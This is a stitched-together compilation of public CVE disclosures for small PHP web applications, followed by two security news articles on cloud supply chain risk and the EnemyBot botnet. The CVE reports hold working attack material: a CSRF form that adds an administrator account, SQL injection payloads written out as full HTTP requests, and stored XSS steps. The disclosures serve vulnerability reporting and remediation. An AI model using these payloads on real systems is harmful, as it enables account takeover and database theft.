Cross Site Request Forgery (CSRF) vulnerability in PbootCMS v2.0.3 via /admin.php?p=/User/index.

<html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://pboot.com:12345/admin.php?p=/User/add" method="POST">
          <input type="hidden" name="formcheck" value="d48ee9bffae5f7fb7022ea1e7dd4a224" />
          <input type="hidden" name="username" value="TplusSs" />
          <input type="hidden" name="realname" value="asd" />
          <input type="hidden" name="password" value="123" />
          <input type="hidden" name="rpassword" value="123" />
          <input type="hidden" name="status" value="1" />
          <input type="hidden" name="roles&#91;0&#93;" value="R101" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

Then open the “/admin.php?p=/User/index” page to see the added system administrator

CVE-2020-20971: There is a CSRF vulnerability that can add the administrator account · Issue #1 · TplusSs/PbootCMS

ChatBot App with Suggestion v1.0 is vulnerable to SQL Injection via /simple_chat_bot/admin/?page=user/manage_user&id=.

**ChatBot App with Suggestion v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html

Vulnerability File: /simple\_chat\_bot/admin/?page=user/manage\_user&id=

Vulnerability location: /simple\_chat\_bot/admin/?page=user/manage\_user&id=, id

\[+\] Payload: /simple\_chat\_bot/admin/?page=user/manage\_user&id=-4%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> id

GET /simple\_chat\_bot/admin/?page\=user/manage\_user&id\=\-4%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

CVE-2022-31969: bug_report/SQLi-1.md at main · k0xx11/bug_report

EGavilan Media User-Registration-and-Login-System-With-Admin-Panel 1.0 is vulnerable to SQL Injection via profile_action - update_user. This allows a remote attacker to compromise Application SQL database.

**Hi  
I found a SQL injection vulnerability User-Registration-and-Login-System-With-Admin-Panel**

POST /User-Registration-and-Login-System-With-Admin-Panel-master/profile_action.php HTTP/1.1  
Host: 192.168.1.3  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 82  
Origin: http://192.168.1.3  
Connection: close  
Referer: http://192.168.1.3/User-Registration-and-Login-System-With-Admin-Panel-master/profile.php  
Cookie: PHPSESSID=54cet827kpno5c9g9i9grjq84h

fullname=test2'%2b(select*from(select(sleep(20)))a)%2b'&username=test1&email=test%40test.com&gender=Male&action=update_user

Above query will only sleep database for 20 second but Using SQLmap bad user can dump the database as show in image.

****

Control -  
User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended.

Remediation -  
To prevent this follow the following steps:  
a) Validate all input data against a whitelist

b) Use of parameterized queries  
String selectStatement = "SELECT \* FROM User WHERE userId = ? ";  
PreparedStatement prepStmt = con.prepareStatement(selectStatement);  
prepStmt.setString(1, userId);  
ResultSet rs = prepStmt.executeQuery();

CVE-2021-44096: Vulnerability/BUG - SQL Injection on "profile_action - update_user" · Issue #2 · EGavilan-Media/User-Registration-and-Login-System-With-Admin-Panel

EGavilan Media Contact-Form-With-Messages-Entry-Management 1.0 is vulnerable to SQL Injection via Addmessage.php. This allows a remote attacker to compromise Application SQL database.

**\# Exploit Title : SQL injection vulnerability in EGavilan Media Contact-Form-With-Messages-Entry-Management 1.0 via “Addmessage.php”.** **that allows a remote attacker to compromise Application SQL database.**

#Exploit Author : Shubham Pandey

#Vendor : EGavilan Media

#Application Link : https://egavilanmedia.com/contact-form-with-messages-entry-management-with-php-and-mysql/

#Github Link: https://github.com/EGavilan-Media/Contact-Form-With-Messages-Entry-Management

#Version: 1.0

\# CVE Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44097

**\# CVE:** CVE-2021–44097

**What is SQL injection :**

SQL injection is a type of online security flaw that allows an attacker to interfere with a web application’s database queries. It allows an attacker to see data that they wouldn’t ordinarily be able to see. This could include data belonging to other users or any other information that the app has access to. In many circumstances, an attacker can modify or remove this data, causing the application’s content or behavior to be permanently altered.

**Attack Vector:**

By exploiting the login Page parameters Using tool like SQLMAP An attacker can dump entire data from the database. The data dumped can further lead to tampering the confidentiality of the user s personal, transaction details and financial information, various session tokens of the users etc. The data obtained can also be publicly disclosed or used for competitive gains leading to financial loss to an organization.

**Vulnerable Parameter:** “firstname=”

**Steps to Reproduce:**

1.  Put = ‘%2b(select\*from(select(sleep(20)))a)%2b’ and verify SQL Database response, if response come after 20 sec that mean Application SQL database is passing given query.

> _Login page request -  
> _POST /Contact-Form-With-Messages-Entry-Management-master/process/contacts/addMessage.php HTTP/1.1  
> Host: 192.168.1.6  
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
> Accept: */*  
> Accept-Language: en-US,en;q=0.5  
> Accept-Encoding: gzip, deflate  
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
> X-Requested-With: XMLHttpRequest  
> Content-Length: 139  
> Origin: http://192.168.1.6  
> Connection: close  
> Referer: http://192.168.1.6/Contact-Form-With-Messages-Entry-Management-master/view/contact.php  
> Cookie: PHPSESSID=8jp0c36flam1krptku4bq9hvf5
> 
> firstname=test'%2b(select*from(select(sleep(20)))a)%2b'&lastname=test&email=sdsada%40gmail.com&phone=123123131&subject=test&message=rtesdas

3\. Web Server accept our Payload and by using tools like “Sqlmap” we can see that payload gets executed and Database can be compromised.

**Author:** https://www.linkedin.com/in/shubham-pandey-10704014b/

CVE-2021-44097: CVE-2021–44097 - Shubham pandey - Medium

EGavilan Media Expense-Management-System 1.0 is vulnerable to SQL Injection via /expense_action.php. This allows a remote attacker to compromise Application SQL database.

**\# Exploit Title : SQL injection vulnerability in EGavilan Media Expense-Management-System 1.0 via /expense\_action.php. that allows a remote attacker to compromise Application SQL database.**

#Exploit Author : Shubham Pandey

#Vendor : EGavilan Media

#Application Link : https://egavilanmedia.com/expense-management-system/

#Github Link: https://github.com/EGavilan-Media/Expense-Management-System

#Version: 1.0

\# CVE Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44098

**\# CVE:** CVE-2021–44098

**What is SQL injection :**

SQL injection is a type of online security flaw that allows an attacker to interfere with a web application’s database queries. It allows an attacker to see data that they wouldn’t ordinarily be able to see. This could include data belonging to other users or any other information that the app has access to. In many circumstances, an attacker can modify or remove this data, causing the application’s content or behavior to be permanently altered.

**Attack Vector:**

By exploiting the login Page parameters Using tool like SQLMAP An attacker can dump entire data from the database. The data dumped can further lead to tampering the confidentiality of the user s personal, transaction details and financial information, various session tokens of the users etc. The data obtained can also be publicly disclosed or used for competitive gains leading to financial loss to an organization.

**Vulnerable Parameter:** “description=”

**Steps to Reproduce:**

1.  Put = ‘%2b(select\*from(select(sleep(20)))a)%2b’ and verify SQL Database response, if response come after 20 sec that mean Application SQL database is passing given query.

> _Login page request -  
> _POST //Expense-Management-System-master/expense_action.php HTTP/1.1  
> Host: 192.168.1.6  
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
> Accept: application/json, text/javascript, */*; q=0.01  
> Accept-Language: en-US,en;q=0.5  
> Accept-Encoding: gzip, deflate  
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
> X-Requested-With: XMLHttpRequest  
> Content-Length: 113  
> Origin: http://192.168.1.6  
> Connection: close  
> Referer: http://192.168.1.6//Expense-Management-System-master/  
> Cookie: PHPSESSID=8jp0c36flam1krptku4bq9hvf5
> 
> description=seafood'%2b(select*from(select(sleep(20)))a)%2b'&amount=3.21&date=2019-08-02&expense_id=2&action=Edit

3\. Web Server accept our Payload and by using tools like “Sqlmap” we can see that payload gets executed and Database can be compromised.

**Author:** https://www.linkedin.com/in/shubham-pandey-10704014b/

CVE-2021-44098: CVE-2021–44098 - Shubham pandey - Medium

A SQL injection vulnerability exists in ProjectWorlds Hospital Management System in php 1.0 on login page that allows a remote attacker to compromise Application SQL database.

**Hospital Management System Mini-Project**

This **was my first short PHP project** for Web Technology subject created in October 2016.

**Features:**

1.  Front Page Slideshow
2.  Login / Logout for customer.
3.  Seperate login for admin (location/hms-admin) - username: admin, password: admin
4.  Navigation Bar
5.  Ability to Add patient detail and book appointment.
6.  CSS using Twitter Bootstrap

more project https://projectworlds.in

https://www.projectworlds.in/php-projects/hospital-management-system-in-php/

CVE-2021-44095: GitHub - projectworldsofficial/hospital-management-system-in-php: This is Hospital Management System Hospital management system is one of the best software that manages various activities in hospital 

Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=.

**Online Fire Reporting System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html

Vulnerability File: /ofrs/admin/?page=reports&date=

Vulnerability location: /ofrs/admin/?page=reports&date=, date

\[+\] Payload: /ofrs/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,database(),5,6,7,8,9,10--+ // Leak place ---> date

GET /ofrs/admin/?page\=reports&date\=2022\-05\-27%27%20union%20select%201,2,3,database(),5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

CVE-2022-31974: bug_report/SQLi-1.md at main · k0xx11/bug_report

Product Show Room Site version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS)   #### Exploit Title: Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS)#### Exploit Author: webraybtl@webray.com.cn inc#### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html#### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code#### Version: Product Show Room Site 1.0#### Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql#### DescriptionPersistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.#### Payload used:`<script>alert(111)</script>`#### Proof of Concept1. Login the CMS. Default Admin AccessUsername: adminPassword: admin1231. Open Page http://172.24.5.107/psrs/admin/?page=system_info/contact_info and click View button2. Put XSS payload  (`<script>alert(111)</script>`) in the Telephone box and click on Update to publish the page   ![image](https://user-images.githubusercontent.com/60683449/171591851-2068eea2-b789-464f-8afb-9f6b6f8eaedd.png)    3. Open http://172.24.5.107/psrs/?p=contact,Viewing the successfully published page,We can see the alert.   ![image](https://user-images.githubusercontent.com/60683449/171591881-2962a429-f2de-4979-8e27-6fdd8f62c61c.png)-------# Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)   #### Exploit Title: Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)#### Exploit Author: webraybtl@webray.com.cn inc#### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html#### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code#### Version: Product Show Room Site 1.0#### Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql#### DescriptionPersistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.#### Payload used:`<script>alert(111)</script>`#### Proof of Concept1. Login the CMS. Default Admin AccessUsername: adminPassword: admin1231. Open Page http://172.24.5.107/psrs/?p=contact 2. Put XSS payload  (`<script>alert(111)</script>`) in the Message box and click on Send Message to publish the page  ![image](https://user-images.githubusercontent.com/60683449/171591580-cc3ca01c-9e37-4e05-9351-4b9d7c7749df.png)  ![image](https://user-images.githubusercontent.com/60683449/171591599-be5e8d7f-1d95-43ad-875a-9884f7052fa6.png)   4. Open http://172.24.5.107/psrs/admin/?page=inquiries,Viewing the Top 1 of Inquiries  page,We can see the alert.  ![image](https://user-images.githubusercontent.com/60683449/171591660-c12ce9ac-aab1-45e9-b99f-7514dd28f698.png)

Product Show Room Site 1.0 Cross Site Scripting

Supply chain woes have dominated headlines, but there's another type of supply chain that's also increasingly at risk: the cloud supply chain.

Supply chain woes have dominated headlines, from raw material and labor shortages, to shipping delays and manufacturing problems. But there's another type of supply chain that's also increasingly at risk: the cloud supply chain.

Cloud supply chain risks have little to do with logistics in the literal sense of the word. Rather, they stem from vulnerabilities in cloud services and processes. Over the last 18 months, 79% of companies have experienced at least one cloud data breach, and 43% have reported 10 or more breaches in that time. And any company, in any industry, is vulnerable.

Though recent breaches have elevated awareness, cloud supply chain attacks are not going away. In fact, because cloud adoption has accelerated due to the COVID-19 pandemic, the threats may increase. So, what's at the root? Risks to the cloud supply chain primarily stem from ecosystem complexity, siloed operations, and lack of insight into software assets, all of which boil down to poor risk management.

But there's good news: gaining a clearer understanding of the supply chain as well as developing a standardized risk management protocol for the entire cloud software development life cycle can reduce the risks and challenges.

**Understanding Threats and Attack Types**

Recent studies into the supply chain have shown that at least 80% of a typical SaaS application is powered by multiple services and vendors, with each component representing a different level of risk. The complexity of this extended operating environment makes it extremely hard to manage, let alone pinpoint vulnerabilities and insecure configurations.

So, what does it look like when your cloud supply chain is under attack? Some attacks will compromise source code. In last year's PHP attack, an attacker compromised the self-hosted Git server and injected two malicious commits that were not detected by code maintainers. Organizations using the software language unknowingly downloaded the malicious code and used it in their operating environment. Dependency attacks, meanwhile, happen when attackers prey on vulnerable dependencies, also injecting them with malware.

Build pipeline threats are perhaps the most damaging types of attacks, since compromised code is turned into an executable format. During the SolarWinds attack, for example, a cybercriminal compromised the build process to insert corrupt Sunspot malware into update packages. SolarWinds did not detect the malware until much later. Though the nature of these attacks may differ, an overarching strategy can prevent them: a better understanding of what's under the hood of your cloud.

**Three Phases of Protection: Assessment, Standardization, and Partnership**

Organizations can reduce their cloud supply chain risks by developing a keen understanding of every piece of their cloud ecosystem. Yet today, just one in five organizations assesses their cloud supply chain in real time. The same number conduct weekly evaluations, and a concerning 58% evaluate their posture once a month or less frequently. This leaves the door open for bad actors.

To protect themselves, it's essential for organizations of all sizes to create a software bill of materials (SBOM), an inventory of all components in the tech stack. By doing so, companies can better understand the complexities of their environment and significantly reduce their vulnerability to cloud supply chain attack.

Once the assessment is complete and users are confident in the security of their cloud supply chains, the next step is to develop a strategy that maintains that level of security. The US National Institute of Standards and Technology's (NIST) framework for vetting cloud vendors can serve as a starting point, but companies should tailor the steps that NIST lays out to their development workflows and processes.

The right partner can also play a key role in risk management, especially for smaller businesses. While mega cloud vendors provide a solid foundation for developers to build secure products, alternative cloud providers can offer something additional: a concierge-style partnership that ensures companies aren't on their own when it comes to security.

For example, Akamai partners with the HackerOne bug bounty program, which has thousands of ethical hackers performing penetration testing against their operating environment and products. Additionally, Akamai offers security controls and protection against supply chain risk by scanning our tech stack.

**Creating a Culture of Security**

As an industry, we are currently in reaction mode. Attacks are on the rise, and organizations aren't taking enough proactive measures to prevent disaster. But as the dependency on cloud continues to grow, no company, big or small, can afford to take this gamble.

Security starts with understanding the stack, assessing the risks associated with each element, and committing to following established best practices. The software supply chain includes multiple departments — purchasing, IT, software engineering, development, release, change management, operations. It really is everyone's job to get it right.

**About the Author**

    

As senior director of information security, Joseph Zhou leads the cybersecurity program, architecture, and operations of Akamai's cloud compute operations. Zhou leads a team of security professionals spanning enterprise security architecture, network security, business continuity, security awareness training, and more. He brings a wealth of industry experience to the role, and previously served in CISO roles at Evive and Transworld Systems.

Managing Extended Software Supply Chain Risks

EnemyBot DDoS botnet is rapidly weaponizing security bugs disclosed in CMS systems like WordPress plug-ins, Android devices, commercial Web servers, and other enterprise applications.

An Internet of Things (IoT) botnet dubbed “EnemyBot" is expanding its front lines to target security vulnerabilities in enterprise services — potentially leading to it being a much more virulent threat than it has been, researchers say.

EnemyBot, which is controlled by a threat actor known as Keksec, is a Linux botnet that emerged on the malware scene in late March. It shares source code with two other well-known botnets, Gafgyt (aka Bashlite) and the mighty Mirai, according to a prior analysis from Fortinet. Like those threats, EnemyBot is used to carry out distributed denial-of-service (DDoS) attacks. Other aspects of the code include smaller elements from Qbot and other malware, and some custom development.

While it began life focusing on adding IoT devices and routers to its botnet footprint, EnemyBot has now evolved to add remote code execution (RCE) exploits for a host of popular business applications, including VMware Workspace ONE, Adobe ColdFusion, WordPress sites (via vulnerable plug-ins like Video Synchro PDF), PHP Scriptcase, and others, according to researchers at AT&T Labs. 

Researchers discovered that the group is using a mix of recent, so-called "one-day" bugs, as well as older known issues, looking to take advantage in lags in patching.

Keksec is "now targeting IoT devices, web servers, Android devices and content management system (CMS) servers," according to the firm's recent report, which notes that the latest version of EnemyBot adds a webscan function containing a total of 24 exploits to attack vulnerabilities of different devices and Web servers and self-propagate. 

The enterprise-focused exploits that were recently added include:

*   Log4Shell vulns: CVE-2021-44228, CVE-2021-45046
*   F5 BIG IP devices: CVE-2022-1388
*   Spring Cloud Gateway: CVE-2022-22947
*   TOTOLink A3000RU wireless router: CVE-2022-25075
*   Kramer VIAWare: CVE-2021-35064
*   PHP Scriptcase: No CVE yet assigned
*   Adobe ColdFusion 11: No CVE yet assigned

"The nature of devices and systems targeted through EnemyBot is different than vulnerabilities aimed at corporate datacenters," Bud Broomhead, CEO at Viakoo, tells Dark Reading. "WordPress installations, Android devices, IoT devices and other targets for EnemyBot are all widely deployed (therefore might be hard to find), are operated by organizations of all sizes, and are often managed by lines of business that lack cybersecurity skills."

**EnemyBot: A Super Soldier?**

In addition to the DDoS capabilities, EnemyBot can also receive commands to download and execute new code that could add to its functions or update its vulnerability list, according to the analysis. This means that, worryingly, the malware can adopt new vulnerabilities within days of those issues being discovered, researchers warned, as seen when it added a bug tracked as CVE-2022-22954 affecting VMware Workspace ONE, almost immediately after disclosure.

Sean Malone, CISO at Demandbase, says that given its rapid development, EnemyBot and others like it present a new urgency for enterprise defenders.

"The rapid weaponization of newly released vulnerabilities highlights the need to be able to patch almost instantaneously when new vulnerabilities are identified," he tells Dark Reading. "We should assume that every piece of software, every application development framework, and every IoT device will have a critical vulnerability identified at some point. Our architectures should be designed to limit the available attack surface, and mitigate the blast radius of a compromised system through defense-in-depth measures."

That should include adding the ability to profile systems and network traffic to know what normal looks like, and alert when the system activity and network traffic deviates from that baseline, he adds.

"This botnet emphasizes the need for rapid patching of internet facing devices and the risks of running apps in the cloud," says John Bambenek, principal threat hunter at Netenrich. "This traffic is easily spotted on the wire, but in typical cloud deployments, organizations aren’t able to run network intrusion detection. If organizations aren’t running NIDS or rapidly patching, they are both blind and vulnerable."

**Keksec & EnemyBot's Future**

For its part, Keksec is a well-resourced group that has been around since 2016, making a name for itself by creating various botnets-for-hire. It's known for exploiting vulnerabilities to invade multiple architectures with polymorphic tools (these can include Linux and Windows payloads, as well as custom Python malware), in order to accomplish everything from DDoS to cryptomining to espionage.

For instance, last year the operators made headlines with the "Simps" botnet, which was built for DDoS attacks on gaming targets. Another of its creations is the HybridMQ-keksec botnet, a Frankenstein-like effort created by combining and modifying the source code of Mirai and Gafgyt, just like EnemyBot.

Keksec is constantly adding to its arsenal, and "has the ability to update and add new capabilities to its arsenal of malware on a daily basis," the AT&T Labs researchers note. And indeed, with the new ability to compromise enterprise services and devices, EnemyBot could be poised to ramp up the volume of its attacks.

"In addition, the malware base source code can now be found online on GitHub, making it widely accessible," according to AT&T Labs, whose researchers also note that this won't be the only new EnemyBot variant to bubble up from Keksec's laboratory. "The developer of the GitHub page on EnemyBot self-describes as a 'full time malware dev,' that is also available for contract work."

That spells swelling attack volumes, researchers warn.

"Being available through GitHub means that many types of threat actors, from professional cybercriminals to amateurs, will be able to adapt EnemyBot into new and multiple variants," says Broomhead. "Without question, this is a red-lights-flashing warning sign for organizations to improve their discovery, threat assessment, and remediation capabilities."

Tag

#php